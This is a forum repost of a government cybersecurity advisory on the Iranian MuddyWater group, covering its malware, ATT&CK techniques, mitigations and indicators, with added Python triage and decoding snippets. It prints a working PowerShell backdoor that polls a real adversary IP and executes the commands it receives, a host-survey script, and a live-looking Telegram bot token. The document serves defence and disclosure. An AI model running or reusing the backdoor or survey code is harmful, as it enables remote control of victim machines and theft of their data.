US-CERT- AA22-055A : Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks

Started by Netwörkheäd, February 24, 2022, 12:14:49 PM


Netwörkheäd

AA22-055A : Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks

Original release date: February 24, 2022

Summary

Actions to Take Today to Protect Against Malicious Activity

* Search for indicators of compromise.
* Use antivirus software.
* Patch all systems (https://us-cert.cisa.gov/ncas/tips/ST04-006).
* Prioritize patching known exploited vulnerabilities (https://www.cisa.gov/known-exploited-vulnerabilities-catalog).
* Train users to recognize and report phishing attempts (https://us-cert.cisa.gov/ncas/tips/ST04-014).
* Use multi-factor authentication (https://us-cert.cisa.gov/ncas/tips/ST05-012).



Note: this advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, version 10. See ATT&CK for Enterprise (https://attack.mitre.org/versions/v10/techniques/enterprise/) for all referenced threat actor tactics and techniques.



The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Cyber Command Cyber National Mission Force (CNMF), and the United Kingdom's National Cyber Security Centre (NCSC-UK) have observed a group of Iranian government-sponsored advanced persistent threat (APT) actors, known as MuddyWater, conducting cyber espionage and other malicious cyber operations targeting a range of government and private-sector organizations across sectors—including telecommunications, defense, local government, and oil and natural gas—in Asia, Africa, Europe, and North America. Note: MuddyWater is also known as Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP.Zagros.



MuddyWater is a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).[1] This APT group has conducted broad cyber campaigns in support of MOIS objectives since approximately 2018. MuddyWater actors are positioned both to provide stolen data and accesses to the Iranian government and to share these with other malicious cyber actors.



MuddyWater actors are known to exploit publicly reported vulnerabilities and use open-source tools and strategies to gain access to sensitive data on victims' systems and deploy ransomware. These actors also maintain persistence on victim networks via tactics such as side-loading dynamic link libraries (DLLs)—to trick legitimate programs into running malware—and obfuscating PowerShell scripts to hide command and control (C2) functions. FBI, CISA, CNMF, and NCSC-UK have observed MuddyWater actors recently using various malware—variants of PowGoop, Small Sieve, Canopy (also known as Starwhale), Mori, and POWERSTATS—along with other tools as part of their malicious activity. 



This advisory provides observed tactics, techniques, and procedures (TTPs); malware; and indicators of compromise (IOCs) associated with this Iranian government-sponsored APT activity to aid organizations in the identification of malicious activity against sensitive networks. 



FBI, CISA, CNMF, NCSC-UK, and the National Security Agency (NSA) recommend organizations apply the mitigations in this advisory and review the following resources for additional information. Note: also see the Additional Resources section.





Click here for a PDF version of this report: https://us-cert.cisa.gov/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf


Technical Details

FBI, CISA, CNMF, and NCSC-UK have observed the Iranian government-sponsored MuddyWater APT group employing spearphishing, exploiting publicly known vulnerabilities, and leveraging multiple open-source tools to gain access to sensitive government and commercial networks. 



As part of its spearphishing campaign, MuddyWater attempts to coax its targeted victims into downloading ZIP files containing either an Excel file with a malicious macro that communicates with the actor's C2 server or a PDF file that drops a malicious file to the victim's network [T1566.001, T1204.002]. MuddyWater actors also use techniques such as side-loading DLLs [T1574.002] to trick legitimate programs into running malware and obfuscating PowerShell scripts [T1059.001] to hide C2 functions [T1027] (see the PowGoop section for more information).



Additionally, the group uses multiple malware sets—including PowGoop, Small Sieve, Canopy/Starwhale, Mori, and POWERSTATS—for loading malware, backdoor access, persistence [TA0003], and exfiltration [TA0010]. See below for descriptions of some of these malware sets, including newer tools or variants in the group's suite. Additionally, see Malware Analysis Report MAR-10369127.r1.v1: MuddyWater (https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-055a) for further details.



PowGoop



MuddyWater actors use new variants of PowGoop malware as their main loader in malicious operations; it consists of a DLL loader and a PowerShell-based downloader. The malicious file impersonates a legitimate file that is signed as a Google Update executable file.



According to samples of PowGoop analyzed by CISA (https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-055a) and CNMF (https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/), PowGoop consists of three components:





These components retrieve encrypted commands from a C2 server. The DLL file hides communications with MuddyWater C2 servers by executing with the Google Update service. 



Small Sieve



According to a sample analyzed by NCSC-UK (https://www.ncsc.gov.uk/files/NCSC-Malware-Analysis-Report-Small-Sieve.pdf), Small Sieve is a simple Python [T1059.006] backdoor distributed using a Nullsoft Scriptable Install System (NSIS) installer, gram_app.exe. The NSIS installer installs the Python backdoor, index.exe, and adds it as a registry run key [T1547.001], enabling persistence [TA0003].



MuddyWater disguises malicious executables and uses filenames and Registry key names associated with Microsoft's Windows Defender to avoid detection during casual inspection. The APT group has also used variations of Microsoft (e.g., "Microsift") and Outlook in its filenames associated with Small Sieve [T1036.005].



Small Sieve provides the basic functionality required to maintain and expand a foothold in victim infrastructure and avoid detection [TA0005] by using custom string and traffic obfuscation schemes together with the Telegram Bot application programming interface (API). Specifically, Small Sieve's beacons and taskings are performed using the Telegram API over Hypertext Transfer Protocol Secure (HTTPS) [T1071.001], and the tasking and beaconing data is obfuscated through a hex byte swapping encoding scheme combined with an obfuscated Base64 function [T1027, T1132.002].



Note: cybersecurity agencies in the United Kingdom and the United States attribute Small Sieve to MuddyWater with high confidence. 



See Appendix B for further analysis of Small Sieve malware.



Canopy



MuddyWater also uses Canopy/Starwhale malware, likely distributed via spearphishing emails with targeted attachments [T1566.001]. According to two Canopy/Starwhale samples analyzed by CISA, Canopy uses Windows Script File (.wsf) scripts distributed by a malicious Excel file. Note: the cybersecurity agencies of the United Kingdom and the United States attribute these malware samples to MuddyWater with high confidence.



In the samples CISA analyzed, a malicious Excel file, Cooperation terms.xls, contained macros written in Visual Basic for Applications (VBA) and two encoded Windows Script Files. When the victim opens the Excel file, they receive a prompt to enable macros [T1204.002]. Once this occurs, the macros are executed, decoding and installing the two embedded Windows Script Files.



The first .wsf is installed in the current user startup folder [T1547.001] for persistence. The file contains hexadecimal (hex)-encoded strings that have been reshuffled [T1027]. The file executes a command to run the second .wsf.



The second .wsf also contains hex-encoded strings that have been reshuffled. This file collects [TA0035] the victim system's IP address, computer name, and username [T1005]. The collected data is then hex-encoded and sent to an adversary-controlled IP address, http[:]88.119.170[.]124, via an HTTP POST request [T1041].



Mori



MuddyWater also uses the Mori backdoor, which uses Domain Name System tunneling to communicate with the group's C2 infrastructure [T1572].



According to one sample analyzed by CISA, FML.dll, Mori uses a DLL written in C++ that is executed with regsvr32.exe via the export DllRegisterServer; this DLL appears to be a component of another program. FML.dll contains approximately 200MB of junk data [T1001.001] in a resource directory 205, number 105. Upon execution, FML.dll creates a mutex, 0x50504060, and performs the following tasks:



  • Deletes the file FILENAME.old and deletes the file by registry value. The filename is the DLL file with a .old extension.
  • Resolves networking APIs from strings that are ADD-encrypted with the key 0x05.
  • Uses Base64 and JavaScript Object Notation (JSON) based on certain key values passed to the JSON library functions. It appears likely that JSON is used to serialize C2 commands and/or their results.
  • Communicates using HTTP over either IPv4 or IPv6, depending on the value of an unidentified flag, for C2 [T1071.001].
  • Reads and/or writes data from the following Registry keys: HKLM\Software\NFC\IPA and HKLM\Software\NFC\(Default).



POWERSTATS



This group is also known to use the POWERSTATS backdoor, which runs PowerShell scripts to maintain persistent access to the victim systems [T1059.001].



CNMF has posted samples further detailing the different parts of MuddyWater's new suite of tools—along with JavaScript files used to establish connections back to malicious infrastructure—to the malware aggregation tool and repository VirusTotal (http://www.virustotal.com/en/user/CYBERCOM_Malware_Alert). Network operators who identify multiple instances of the tools on the same network should investigate further, as this may indicate the presence of an Iranian malicious cyber actor.



MuddyWater actors are also known to exploit unpatched vulnerabilities as part of their targeted operations. FBI, CISA, CNMF, and NCSC-UK have observed this APT group recently exploiting the Microsoft Netlogon elevation of privilege vulnerability (CVE-2020-1472, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1472) and the Microsoft Exchange memory corruption vulnerability (CVE-2020-0688, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0688). See CISA's Known Exploited Vulnerabilities Catalog (https://www.cisa.gov/known-exploited-vulnerabilities-catalog) for additional vulnerabilities with known exploits, and the joint Cybersecurity Advisory "Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities" (https://www.cisa.gov/uscert/ncas/alerts/aa21-321a) for additional Iranian APT group-specific vulnerability exploits.



Survey Script



The following script is an example of a survey script used by MuddyWater to enumerate information about victim computers. It queries the Windows Management Instrumentation (WMI) service to obtain information about the compromised machine to generate a string, with these fields separated by a delimiter (e.g., ;; in this sample). The produced string is usually encoded by the MuddyWater implant and sent to an adversary-controlled IP address.



$O = Get-WmiObject Win32_OperatingSystem;
$S = $O.Name;                                        # OS name string
$S += ";;";
$ips = "";
Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "IPEnabled=True" | % { $ips = $ips + ", " + $_.IPAddress[0] };
$S += $ips.substring(1);                             # first IPv4 address of each enabled adapter, leading comma dropped
$S += ";;";
$S += $O.OSArchitecture;
$S += ";;";
$S += [System.Net.DNS]::GetHostByName('').HostName;  # local host name (FQDN)
$S += ";;";
$S += ((Get-WmiObject Win32_ComputerSystem).Domain);
$S += ";;";
$S += $env:UserName;
$S += ";;";
$AntiVirusProducts = Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct -ComputerName $env:computername;
$resAnti = @();
foreach ($AntiVirusProduct in $AntiVirusProducts) { $resAnti += $AntiVirusProduct.displayName };
$S += $resAnti;                                      # registered antivirus product display names
echo $S;


Newly Identified PowerShell Backdoor



The newly identified PowerShell backdoor used by MuddyWater below uses a single-byte Exclusive-OR (XOR) to encrypt communications with the key 0x02 to adversary-controlled infrastructure. The script is lightweight in functionality and uses the InvokeScript method to execute responses received from the adversary.



function encode($txt, $key) {
    $enByte = [Text.Encoding]::UTF8.GetBytes($txt);
    for ($i = 0; $i -lt $enByte.count; $i++) { $enByte[$i] = $enByte[$i] -bxor $key; }   # single-byte XOR
    $encodetxt = [Convert]::ToBase64String($enByte);
    return $encodetxt;
}
function decode($txt, $key) {
    $enByte = [System.Convert]::FromBase64String($txt);
    for ($i = 0; $i -lt $enByte.count; $i++) { $enByte[$i] = $enByte[$i] -bxor $key; }   # XOR is its own inverse
    $dtxt = [System.Text.Encoding]::UTF8.GetString($enByte);
    return $dtxt;
}
$global:tt = 20;                                    # beacon interval in seconds
while ($true) {
    try {
        # Poll the adversary-controlled server for tasking (the system proxy is honored)
        $w = [System.Net.HttpWebRequest]::Create('http://95.181.161.49:80/index.php?id=<victim identifier>');
        $w.proxy = [Net.WebRequest]::GetSystemWebProxy();
        $r = (New-Object System.IO.StreamReader($w.GetResponse().GetResponseStream())).ReadToEnd();
        if ($r.Length -gt 0) {
            # Decode the response with key 0x02 and execute it as PowerShell via InvokeScript
            $res = [string]$ExecutionContext.InvokeCommand.InvokeScript((decode $r 2));
            # Return the result, XOR-encoded and Base64-encoded, in a cookie header
            $wr = [System.Net.HttpWebRequest]::Create('http://95.181.161.49:80/index.php?id=<victim identifier>');
            $wr.proxy = [Net.WebRequest]::GetSystemWebProxy();
            $wr.Headers.Add('cookie', (encode $res 2));
            $wr.GetResponse().GetResponseStream();
        }
    } catch {}
    Start-Sleep -Seconds $global:tt;
}
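An added example, not code from the advisory or from any MuddyWater tooling: a Python decoder a defender can run over captured traffic from the backdoor above (Base64, then single-byte XOR with key 0x02), combined with a parser for the ";;"-delimited record assembled by the survey script in the previous section. The sample survey record and its host names and IP addresses are constructed.

```python
"""Decode XOR(0x02)+Base64 backdoor messages and parse survey-script records.

Added example for incident triage; the key, delimiter and field order come from
the advisory's samples, everything else here is assumed or constructed.
"""
import base64
from typing import Dict, List, Optional

XOR_KEY = 0x02   # single-byte key used by the PowerShell backdoor sample
DELIM = ";;"     # field delimiter used by the survey script sample

# Field order follows the survey script's concatenation order.
SURVEY_FIELDS = ["os_name", "ip_addresses", "os_architecture",
                 "hostname", "domain", "username", "antivirus"]


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key (the operation is its own inverse)."""
    return bytes(b ^ key for b in data)


def decode_message(token: str, key: int = XOR_KEY) -> str:
    """Reverse the backdoor's encode(): Base64-decode, XOR, then UTF-8 decode.

    Raises ValueError (binascii.Error is a subclass) if the token is not Base64.
    """
    raw = base64.b64decode(token, validate=True)
    return xor_bytes(raw, key).decode("utf-8", errors="replace")


def encode_message(text: str, key: int = XOR_KEY) -> str:
    """Mirror of decode_message(); used here only to construct test material."""
    return base64.b64encode(xor_bytes(text.encode("utf-8"), key)).decode("ascii")


def parse_survey(text: str) -> Optional[Dict[str, object]]:
    """Split a survey-script record into named fields, or return None if it is not one.

    The survey script builds the IP field as ", ip1, ip2" and drops the first
    character, so the field keeps a leading space; strip() handles that.
    """
    parts = text.split(DELIM)
    if len(parts) != len(SURVEY_FIELDS):
        return None
    record: Dict[str, object] = dict(zip(SURVEY_FIELDS, (p.strip() for p in parts)))
    ips: List[str] = [ip.strip() for ip in str(record["ip_addresses"]).split(",") if ip.strip()]
    record["ip_addresses"] = ips
    return record


def triage_cookie(cookie_value: str, key: int = XOR_KEY) -> Dict[str, object]:
    """Decode a captured cookie header value and classify what the implant sent back."""
    try:
        plain = decode_message(cookie_value, key)
    except ValueError:
        return {"kind": "not-base64", "decoded": None, "survey": None}
    survey = parse_survey(plain)
    return {"kind": "survey" if survey else "other", "decoded": plain, "survey": survey}


# Constructed sample of the kind of record the survey script assembles (RFC 5737 addresses).
SAMPLE_SURVEY = DELIM.join([
    "Microsoft Windows 10 Pro|C:\\WINDOWS|\\Device\\Harddisk0\\Partition2",
    " 192.0.2.10, 192.0.2.11",
    "64-bit",
    "WS01.example.test",
    "example.test",
    "jdoe",
    "Windows Defender",
])


if __name__ == "__main__":
    captured = encode_message(SAMPLE_SURVEY)          # what the cookie header would carry
    result = triage_cookie(captured)
    print(result["kind"])                              # survey
    print(result["survey"])
```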


MITRE ATT&CK Techniques



MuddyWater (https://attack.mitre.org/groups/G0069/) uses the ATT&CK techniques listed in table 1.



Table 1: MuddyWater ATT&CK Techniques [2]

Technique Title | ID | Use

Reconnaissance
Gather Victim Identity Information: Email Addresses | T1589.002 | MuddyWater has specifically targeted government agency employees with spearphishing emails.

Resource Development
Acquire Infrastructure: Web Services | T1583.006 | MuddyWater has used file sharing services including OneHub to distribute tools.
Obtain Capabilities: Tool | T1588.002 | MuddyWater has made use of the legitimate tools ConnectWise and RemoteUtilities for access to target environments.

Initial Access
Phishing: Spearphishing Attachment | T1566.001 | MuddyWater has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments.
Phishing: Spearphishing Link | T1566.002 | MuddyWater has sent targeted spearphishing emails with malicious links.

Execution
Windows Management Instrumentation | T1047 | MuddyWater has used malware that leveraged Windows Management Instrumentation for execution and querying host information.
Command and Scripting Interpreter: PowerShell | T1059.001 | MuddyWater has used PowerShell for execution.
Command and Scripting Interpreter: Windows Command Shell | T1059.003 | MuddyWater has used a custom tool for creating reverse shells.
Command and Scripting Interpreter: Visual Basic | T1059.005 | MuddyWater has used Visual Basic Script (VBS) files to execute its POWERSTATS payload, as well as macros.
Command and Scripting Interpreter: Python | T1059.006 | MuddyWater has used tools developed in Python, including Out1.
Command and Scripting Interpreter: JavaScript | T1059.007 | MuddyWater has used JavaScript files to execute its POWERSTATS payload.
Exploitation for Client Execution | T1203 | MuddyWater has exploited the Office vulnerability CVE-2017-0199 for execution.
User Execution: Malicious Link | T1204.001 | MuddyWater has distributed URLs in phishing emails that link to lure documents.
User Execution: Malicious File | T1204.002 | MuddyWater has attempted to get users to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails.
Inter-Process Communication: Component Object Model | T1559.001 | MuddyWater has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook.
Inter-Process Communication: Dynamic Data Exchange | T1559.002 | MuddyWater has used malware that can execute PowerShell scripts via Dynamic Data Exchange.

Persistence
Scheduled Task/Job: Scheduled Task | T1053.005 | MuddyWater has used scheduled tasks to establish persistence.
Office Application Startup: Office Template Macros | T1137.001 | MuddyWater has used a Word Template, Normal.dotm, for persistence.
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | T1547.001 | MuddyWater has added the Registry Run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding to establish persistence.

Privilege Escalation
Abuse Elevation Control Mechanism: Bypass User Account Control | T1548.002 | MuddyWater uses various techniques to bypass user account control.
Credentials from Password Stores | T1555 | MuddyWater has performed credential dumping with LaZagne and other tools, including by dumping passwords saved in victim email.
Credentials from Web Browsers | T1555.003 | MuddyWater has run tools including Browser64 to steal passwords saved in victim web browsers.

Defense Evasion
Obfuscated Files or Information | T1027 | MuddyWater has used Daniel Bohannon's Invoke-Obfuscation framework and obfuscated PowerShell scripts. The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands.
Steganography | T1027.003 | MuddyWater has stored obfuscated JavaScript code in an image file named temp.jpg.
Compile After Delivery | T1027.004 | MuddyWater has used the .NET csc.exe tool to compile executables from downloaded C# code.
Masquerading: Match Legitimate Name or Location | T1036.005 | MuddyWater has disguised malicious executables and used filenames and Registry key names associated with Windows Defender. E.g., Small Sieve uses variations of Microsoft (Microsift) and Outlook in its filenames to attempt to avoid detection during casual inspection.
Deobfuscate/Decode Files or Information | T1140 | MuddyWater decoded Base64-encoded PowerShell commands using a VBS file.
Signed Binary Proxy Execution: CMSTP | T1218.003 | MuddyWater has used CMSTP.exe and a malicious .INF file to execute its POWERSTATS payload.
Signed Binary Proxy Execution: Mshta | T1218.005 | MuddyWater has used mshta.exe to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution.
Signed Binary Proxy Execution: Rundll32 | T1218.011 | MuddyWater has used malware that leveraged rundll32.exe in a Registry Run key to execute a .dll.
Execution Guardrails | T1480 | The Small Sieve payload used by MuddyWater will only execute correctly if the word "Platypus" is passed to it on the command line.
Impair Defenses: Disable or Modify Tools | T1562.001 | MuddyWater can disable the system's local proxy settings.

Credential Access
OS Credential Dumping: LSASS Memory | T1003.001 | MuddyWater has performed credential dumping with Mimikatz and procdump64.exe.
OS Credential Dumping: LSA Secrets | T1003.004 | MuddyWater has performed credential dumping with LaZagne.
OS Credential Dumping: Cached Domain Credentials | T1003.005 | MuddyWater has performed credential dumping with LaZagne.
Unsecured Credentials: Credentials In Files | T1552.001 | MuddyWater has run a tool that steals passwords saved in victim email.

Discovery
System Network Configuration Discovery | T1016 | MuddyWater has used malware to collect the victim's IP address and domain name.
System Owner/User Discovery | T1033 | MuddyWater has used malware that can collect the victim's username.
System Network Connections Discovery | T1049 | MuddyWater has used a PowerShell backdoor to check for Skype connections on the target machine.
Process Discovery | T1057 | MuddyWater has used malware to obtain a list of running processes on the system.
System Information Discovery | T1082 | MuddyWater has used malware that can collect the victim's OS version and machine name.
File and Directory Discovery | T1083 | MuddyWater has used malware that checked if the ProgramData folder had folders or files with the keywords "Kasper," "Panda," or "ESET."
Account Discovery: Domain Account | T1087.002 | MuddyWater has used cmd.exe net user /domain to enumerate domain users.
Software Discovery | T1518 | MuddyWater has used a PowerShell backdoor to check for Skype connectivity on the target machine.
Security Software Discovery | T1518.001 | MuddyWater has used malware to check running processes against a hard-coded list of security tools often used by malware researchers.

Collection
Screen Capture | T1113 | MuddyWater has used malware that can capture screenshots of the victim's machine.
Archive Collected Data: Archive via Utility | T1560.001 | MuddyWater has used the native Windows cabinet creation tool, makecab.exe, likely to compress stolen data to be uploaded.

Command and Control
Application Layer Protocol: Web Protocols | T1071.001 | MuddyWater has used HTTP for C2 communications. E.g., Small Sieve beacons and tasking are performed using the Telegram API over HTTPS.
Proxy: External Proxy | T1090.002 | MuddyWater has controlled POWERSTATS from behind a proxy network to obfuscate the C2 location. MuddyWater has used a series of compromised websites that victims connected to randomly to relay information to C2.
Web Service: Bidirectional Communication | T1102.002 | MuddyWater has used web services including OneHub to distribute remote access tools.
Multi-Stage Channels | T1104 | MuddyWater has used one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back.
Ingress Tool Transfer | T1105 | MuddyWater has used malware that can upload additional files to the victim's machine.
Data Encoding: Standard Encoding | T1132.001 | MuddyWater has used tools to encode C2 communications, including Base64 encoding.
Data Encoding: Non-Standard Encoding | T1132.002 | MuddyWater uses tools such as Small Sieve, which employs a custom hex byte swapping encoding scheme to obfuscate tasking traffic.
Remote Access Software | T1219 | MuddyWater has used a legitimate application, ScreenConnect, to manage systems remotely and move laterally.

Exfiltration
Exfiltration Over C2 Channel | T1041 | MuddyWater has used C2 infrastructure to receive exfiltrated data.



Mitigations

Protective Controls and Architecture

  • Deploy application control software to limit the applications and executable code that can be run by users. Email attachments and files downloaded via links in emails often contain executable code.

Identity and Access Management

  • Use multifactor authentication where possible, particularly for webmail, virtual private networks, and accounts that access critical systems.
  • Limit the use of administrator privileges. Users who browse the internet, use email, and execute code with administrator privileges make for excellent spearphishing targets because their system—once infected—enables attackers to move laterally across the network, gain additional accesses, and access highly sensitive information.

Phishing Protection

  • Enable antivirus and anti-malware software and update signature definitions in a timely manner. Well-maintained antivirus software may prevent use of commonly deployed attacker tools that are delivered via spearphishing.
  • Be suspicious of unsolicited contact via email or social media from any individual you do not know personally. Do not click on hyperlinks or open attachments in these communications.
  • Consider adding an email banner to emails received from outside your organization and disabling hyperlinks in received emails.
  • Train users through awareness and simulations to recognize and report phishing and social engineering attempts. Identify and suspend access of user accounts exhibiting unusual activity.
  • Adopt threat reputation services at the network device, operating system, application, and email service levels. Reputation services can be used to detect or prevent low-reputation email addresses, files, URLs, and IP addresses used in spearphishing attacks.



Vulnerability and Configuration Management





Additional Resources





References



[1] CNMF Article: Iranian Intel Cyber Suite of Malware Uses Open Source Tools, https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/

[2] MITRE ATT&CK: MuddyWater, https://attack.mitre.org/versions/v10/groups/G0069/



Caveats



The information you have accessed or received is being provided "as is" for informational purposes only. The FBI, CISA, CNMF, and NSA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the FBI, CISA, CNMF, or NSA.



Purpose



This document was developed by the FBI, CISA, CNMF, NCSC-UK, and NSA in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. The United States' NSA agrees with this attribution and the details provided in this report.



Appendix A: IOCs



The following IP addresses are associated with MuddyWater activity:






Appendix B: Small Sieve



Note: the information contained in this appendix is from NCSC-UK analysis of a Small Sieve sample.



Metadata



Table 2: Gram.app.exe Metadata

Filename: gram_app.exe
Description: NSIS installer that installs and runs the index.exe backdoor and adds a persistence registry key
Size: 16999598 bytes
MD5: 15fa3b32539d7453a9a85958b77d4c95
SHA-1: 11d594f3b3cf8525682f6214acb7b7782056d282
SHA-256: b75208393fa17c0bcbc1a07857686b8c0d7e0471d00a167a07fd0d52e1fc9054
Compile Time: 2021-09-25 21:57:46 UTC


 



Table 3: Index.exe Metadata

Filename: index.exe
Description: The final PyInstaller-bundled Python 3.9 backdoor
Size: 17263089 bytes
MD5: 5763530f25ed0ec08fb26a30c04009f1
SHA-1: 2a6ddf89a8366a262b56a251b00aafaed5321992
SHA-256: bf090cf7078414c9e157da7002ca727f06053b39fa4e377f9a0050f2af37d3a2
Compile Time: 2021-08-01 04:39:46 UTC


 



Functionality 



Installation 


Small Sieve is distributed as a large (16MB) NSIS installer named gram_app.exe, which does not appear to masquerade as a legitimate application. Once executed, the backdoor binary index.exe is installed in the user's AppData/Roaming directory and is added as a Run key in the registry to enable persistence after reboot.



The installer then executes the backdoor with the "Platypus" argument [T1480, https://attack.mitre.org/versions/v10/techniques/T1480/], which is also present in the registry persistence key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OutlookMicrosift



Configuration 


The backdoor attempts to restore previously initialized session data from %LocalAppData%\MicrosoftWindowsOutlookDataPlus.txt



If this file does not exist, then it uses the hardcoded values listed in table 4:



Table 4: Credentials and Session Values

Field: Chat ID
Value: 2090761833
Description: This is the Telegram Channel ID that beacons are sent to and from which tasking requests are received. Tasking requests are dropped if they do not come from this channel. This value cannot be changed.

Field: Bot ID
Value: Random value between 10,000,000 and 90,000,000
Description: This is a bot identifier generated at startup that is sent to the C2 in the initial beacon. Commands must be prefixed with /com[Bot ID] in order to be processed by the malware.

Field: Telegram Token
Value: 2003026094: AAGoitvpcx3SFZ2_6YzIs4La_kyDF1PbXrY
Description: This is the initial token used to authenticate each message to the Telegram Bot API.
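The Installation and Configuration sections above give a defender three host artifacts to look for: the OutlookMicrosift Run value launching index.exe with the Platypus argument, the session file MicrosoftWindowsOutlookDataPlus.txt under LocalAppData, and the SHA-256 hashes in Tables 2 and 3. The following Python is an added triage helper, not part of the advisory; it runs over constructed registry-export and file-listing tuples rather than a live host, and the sample paths, user name and the all-zero hash are made up for illustration.

```python
import re

# Small Sieve host indicators as documented in Appendix B of the advisory.
RUN_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
RUN_VALUE_NAME = "OutlookMicrosift"
CONFIG_FILE = "MicrosoftWindowsOutlookDataPlus.txt"
KNOWN_SHA256 = {
    "b75208393fa17c0bcbc1a07857686b8c0d7e0471d00a167a07fd0d52e1fc9054": "gram_app.exe",
    "bf090cf7078414c9e157da7002ca727f06053b39fa4e377f9a0050f2af37d3a2": "index.exe",
}
# Matches a Run value whose command line starts index.exe with the Platypus argument.
PLATYPUS_RE = re.compile(r'index\.exe"?\s+Platypus', re.IGNORECASE)


def triage(run_entries, files):
    """run_entries: (key, value_name, data) tuples as exported from the registry.
    files: (path, sha256) tuples for files under the user profile.
    Returns a list of findings; an empty list means no indicator matched."""
    findings = []
    for key, name, data in run_entries:
        if key.lower() == RUN_KEY.lower() and name == RUN_VALUE_NAME:
            findings.append(f"Run value '{name}' matches Small Sieve persistence: {data}")
        if PLATYPUS_RE.search(data):
            findings.append(f"Run value '{name}' starts index.exe with Platypus argument: {data}")
    for path, digest in files:
        base = path.rsplit("\\", 1)[-1]
        if base.lower() == CONFIG_FILE.lower() and "\\local\\" in path.lower():
            findings.append(f"Small Sieve session file present: {path}")
        if digest.lower() in KNOWN_SHA256:
            findings.append(f"Known Small Sieve sample {KNOWN_SHA256[digest.lower()]} at {path}")
    return findings


# Constructed sample data (hypothetical host; not taken from a real incident).
SAMPLE_RUN = [
    (RUN_KEY, "OneDrive", r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    (RUN_KEY, "OutlookMicrosift", r'"C:\Users\alice\AppData\Roaming\index.exe" Platypus'),
]
SAMPLE_FILES = [
    (r"C:\Users\alice\AppData\Roaming\index.exe",
     "bf090cf7078414c9e157da7002ca727f06053b39fa4e377f9a0050f2af37d3a2"),
    (r"C:\Users\alice\AppData\Local\MicrosoftWindowsOutlookDataPlus.txt", "0" * 64),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_RUN, SAMPLE_FILES):
        print(finding)
```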


 



Tasking 



Small Sieve beacons via the Telegram Bot API, sending the configured Bot ID, the currently logged-in user, and the host's IP address, as described in the Communications (Beacon format) section below. It then waits for tasking as a Telegram bot using the python-telegram-bot module. 



Two task formats are supported: 




       
  • /start – no argument is passed; this causes the beacon information to be repeated.

  • /com[BotID] [command] – for issuing commands passed in the argument.



The following commands are supported by the second of these formats, as described in table 5: 



Table 5: Supported Commands

Command: delete
Description: This command causes the backdoor to exit; it does not remove persistence.

Command: download url""filename
Description: The URL will be fetched and saved to the provided filename using the Python urllib module urlretrieve function.

Command: change token""newtoken
Description: The backdoor will reconnect to the Telegram Bot API using the provided token newtoken. This updated token will be stored in the encoded MicrosoftWindowsOutlookDataPlus.txt file.

Command: disconnect
Description: The original connection to Telegram is terminated. It is likely used after a change token command is issued.


 



Any commands other than those detailed in table 5 are executed directly by passing them to cmd.exe /c, and the output is returned as a reply.
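For an analyst reviewing captured Telegram Bot API traffic, the tasking rules above (the hardcoded Chat ID, the /start beacon, the /com[BotID] prefix and the four named commands, with everything else going to cmd.exe /c) translate directly into a classifier. The Python below is an added example, not code from the advisory or from the sample; the getUpdates-style JSON is constructed, and the assumption that a task arrives as either a "message" or a "channel_post" object is mine.

```python
import json
import re

CHAT_ID = 2090761833  # Telegram Channel ID hardcoded in the sample (Table 4)
# /com immediately followed by the numeric Bot ID, then the command text.
COM_RE = re.compile(r"^/com(?P<bot>\d+)\s*(?P<cmd>.*)$", re.DOTALL)


def classify_task(text):
    """Map one message text to the tasking category Appendix B describes."""
    text = text.strip()
    if text == "/start":
        return ("beacon", None)          # beacon information is repeated
    m = COM_RE.match(text)
    if not m:
        return ("ignored", None)         # neither task format; backdoor ignores it
    cmd = m.group("cmd").strip()
    if cmd == "delete":
        return ("exit", None)            # process exits, persistence remains
    if cmd.startswith("download "):
        return ("file-download", cmd[len("download "):])
    if cmd.startswith("change token "):
        return ("token-rotation", cmd[len("change token "):])
    if cmd == "disconnect":
        return ("disconnect", None)
    return ("shell-command", cmd)        # anything else is run via cmd.exe /c


def triage_updates(raw_json):
    """Return (update_id, category, argument) for every update in a captured
    getUpdates-style payload. Messages not from CHAT_ID would be dropped by the
    backdoor, so they are flagged 'wrong-chat' rather than classified."""
    out = []
    for upd in json.loads(raw_json)["result"]:
        msg = upd.get("message") or upd.get("channel_post") or {}
        chat = msg.get("chat", {}).get("id")
        text = msg.get("text", "")
        if chat != CHAT_ID:
            out.append((upd["update_id"], "wrong-chat", text))
            continue
        cat, arg = classify_task(text)
        out.append((upd["update_id"], cat, arg))
    return out


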